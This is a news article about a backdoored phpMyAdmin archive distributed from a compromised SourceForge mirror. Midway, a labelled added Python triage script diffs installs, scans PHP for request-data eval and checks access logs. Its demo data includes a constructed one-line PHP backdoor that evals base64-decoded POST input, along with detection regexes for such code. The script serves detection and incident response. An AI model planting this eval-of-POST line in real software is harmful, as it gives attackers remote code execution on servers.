Questions abound as malicious phpMyAdmin backdoor found on SourceForge site

Secret code added to the package gives attackers the ability to hijack servers.

A screenshot of a system containing a malicious backdoor that was snuck into the open-source phpMyAdmin package. Researchers said the file date may be fraudulent.

Developers of phpMyAdmin warned users they may be running a malicious version of the open-source software package after discovering backdoor code was snuck into a package being distributed over the widely used SourceForge repository.

The backdoor gives remote attackers control of the server running the modified phpMyAdmin, a Web-based tool for managing MySQL databases. The malicious script lives in a file named server_sync.php; it takes PHP code embedded in an ordinary HTTP POST request and executes it, so anyone who knows the backdoor is present can run code of their choice on the server. HD Moore, CSO of Rapid7 and chief architect of the Metasploit exploit framework used by penetration testers and hackers, told Ars that a Metasploit module testing for the backdoor has already been added.

The backdoor is concerning because it was distributed on one of the official mirrors for SourceForge, which hosts more than 324,000 open-source projects, serves more than 46 million consumers, and handles more than four million downloads each day. SourceForge officials are still investigating the breach, so crucial questions remain unanswered. It's still unclear, for instance, if the compromised server hosted other maliciously modified software packages, if other official SourceForge mirror sites were also affected, and if the central repository that feeds these mirror sites might also have been attacked.

"If that one mirror was compromised, nearly every SourceForge package on that mirror could have been backdoored, too," Moore said. "So you're looking at not just phpMyAdmin, but 12,000 other projects. If that one mirror was compromised and other projects were modified this isn't just 1,000 people. This is up to a couple hundred thousand."

An advisory posted Tuesday on phpMyAdmin said: "One of the SourceForge.net mirrors, namely cdnetworks-kr-1, was being used to distribute a modified archive of phpMyAdmin, which includes a backdoor. This backdoor is located in file server_sync.php and allows an attacker to remotely execute PHP code. Another file, js/cross_framing_protection.js, has also been modified." phpMyAdmin officials didn't respond to e-mails seeking to learn how long the backdoored version had been available and how many people have downloaded it.

Update: In a blog post, SourceForge officials said they believe phpMyAdmin-3.5.2.2-all-languages.zip was the only modified file on the cdnetworks mirror, but they are continuing to investigate to make sure. Logs indicate that about 400 people downloaded the malicious package. The provider of the Korea-based mirror has confirmed the breach, which is believed to have happened around September 22, and indicated it was limited to that single mirror site. The machine has been taken out of rotation.

"Downloaders are at risk only if a corrupt copy of this software was obtained, installed on a server, and serving was enabled," the SourceForge post said. "Examination of web logs and other server data should help confirm whether this backdoor was accessed."
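The two places to look are the ones the article and the SourceForge post point at: the unpacked phpMyAdmin tree (for server_sync.php, the altered js/cross_framing_protection.js, or any other PHP that executes request-supplied data) and the web server's access logs (for requests to server_sync.php). The following triage script is an added example, not code from phpMyAdmin, SourceForge or Rapid7. It assumes you still have, or can re-download from a trusted mirror, a clean unpack of the same release to diff against; the file contents, the stand-in backdoor line and the log entries it uses are constructed for the demo and are not the real modified files or real logs.

```python
"""Triage a phpMyAdmin install for the SourceForge mirror backdoor (added example).

Three independent checks, all hypothetical helper code:
  1. diff_trees():             files added to or changed in the install versus a known-clean unpack
  2. scan_php_tree():          heuristic grep for PHP that evaluates request-supplied data
  3. find_backdoor_requests(): combined-format access log lines that hit server_sync.php
"""
import hashlib
import re
import tempfile
from pathlib import Path

BACKDOOR_FILE = "server_sync.php"  # file named in the phpMyAdmin advisory

# Same-line heuristic for "code taken from the request gets executed". Kept deliberately
# narrow: a false negative here is still caught by diff_trees(); a false positive costs a look.
EVAL_PATTERNS = (
    re.compile(r"\b(eval|assert|create_function)\s*\(.*\$_(POST|GET|REQUEST|COOKIE)\b"),
)

# Apache/nginx "combined" format; only client, timestamp, request line and status are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def _digest(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()


def _files(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}


def diff_trees(clean_root, suspect_root):
    """Return (added, modified): paths only in the suspect tree, and shared paths whose SHA-256 differs."""
    clean, suspect = _files(clean_root), _files(suspect_root)
    added = sorted(set(suspect) - set(clean))
    modified = sorted(p for p in set(suspect) & set(clean) if _digest(suspect[p]) != _digest(clean[p]))
    return added, modified


def scan_php_tree(root):
    """Return sorted (relative_path, line_no, line) for PHP lines that evaluate request data."""
    root = Path(root)
    findings = []
    for path in root.rglob("*.php"):
        for no, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            if any(pat.search(line) for pat in EVAL_PATTERNS):
                findings.append((path.relative_to(root).as_posix(), no, line.strip()))
    return sorted(findings)


def find_backdoor_requests(log_lines):
    """Return (ip, timestamp, method, status) for every request whose path is server_sync.php.
    A POST answered with 200 is the case the SourceForge post asks you to look for."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path").split("?", 1)[0].rsplit("/", 1)[-1] == BACKDOOR_FILE:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"), int(m.group("status"))))
    return hits


# ---- constructed demo data: not real phpMyAdmin files, not the real backdoor, not real logs ----
CLEAN_FILES = {
    "index.php": "<?php\nrequire 'libraries/common.inc.php';\n",
    "libraries/common.inc.php": "<?php\n$token = isset($_POST['token']) ? $_POST['token'] : '';\n",  # POST, no eval
    "js/cross_framing_protection.js": "if (self != top) top.location = self.location;\n",
}
SUSPECT_FILES = dict(CLEAN_FILES)
# Stand-in for the behaviour the article describes: PHP code carried in a POST body is executed.
SUSPECT_FILES["server_sync.php"] = "<?php\nif (isset($_POST['code'])) { eval(base64_decode($_POST['code'])); }\n"
SUSPECT_FILES["js/cross_framing_protection.js"] = CLEAN_FILES["js/cross_framing_protection.js"] + "// altered\n"

SAMPLE_LOG = [  # constructed; RFC 5737 documentation addresses
    '203.0.113.7 - - [24/Sep/2012:10:14:02 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [24/Sep/2012:10:15:31 +0000] "POST /phpmyadmin/server_sync.php HTTP/1.1" 200 47',
    '198.51.100.9 - - [24/Sep/2012:10:15:40 +0000] "POST /phpmyadmin/server_sync.php?x=1 HTTP/1.1" 200 913',
    '203.0.113.7 - - [24/Sep/2012:10:16:00 +0000] "GET /phpmyadmin/js/cross_framing_protection.js HTTP/1.1" 200 300',
]


def _write_tree(files):
    root = Path(tempfile.mkdtemp())
    for rel, body in files.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_text(body)
    return root


def run_demo():
    """Materialise the two constructed trees and run all three checks; returns their results."""
    clean, suspect = _write_tree(CLEAN_FILES), _write_tree(SUSPECT_FILES)
    return diff_trees(clean, suspect), scan_php_tree(suspect), find_backdoor_requests(SAMPLE_LOG)


if __name__ == "__main__":
    (added, modified), evals, hits = run_demo()
    print("added files:", added)
    print("modified files:", modified)
    print("PHP evaluating request data:", evals)
    print("requests to backdoor:", hits)
```

On a real install, point diff_trees at the live document root and a fresh unpack of the same release from a trusted source, and feed find_backdoor_requests the whole access log, not a sample. The tree diff is the check to trust: it does not depend on recognising the backdoor's coding style and will also surface the modified JavaScript file. The eval heuristic is a second opinion for installs where no clean copy is available, and a hit on server_sync.php in the logs with a POST and a 200 means the backdoor was not just present but used, which turns a clean-up into an incident.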

It's not the first time a widely used open-source project has been hit by a breach affecting the security of its many downstream users. In June of last year, WordPress required all account holders on WordPress.org to change their passwords after discovering that hackers had planted malicious software on the site. Three months earlier, maintainers of the PHP programming language spent several days scouring their source code for malicious modifications after discovering that one of their servers had been breached.

A three-day security breach in 2010 on ProFTPD's distribution server meant that users who downloaded the package during that window received a copy containing a malicious backdoor. The main source-code repository for the Free Software Foundation was briefly shuttered that same year following the discovery of an attack that compromised some of the website's account passwords and may have allowed unfettered administrative access. And last August, multiple servers used to maintain and distribute the Linux kernel were infected with malware that gained root access, although maintainers said the source repository itself was unaffected.

This article will be updated as more details become available.

Article updated to include details from SourceForge blog post.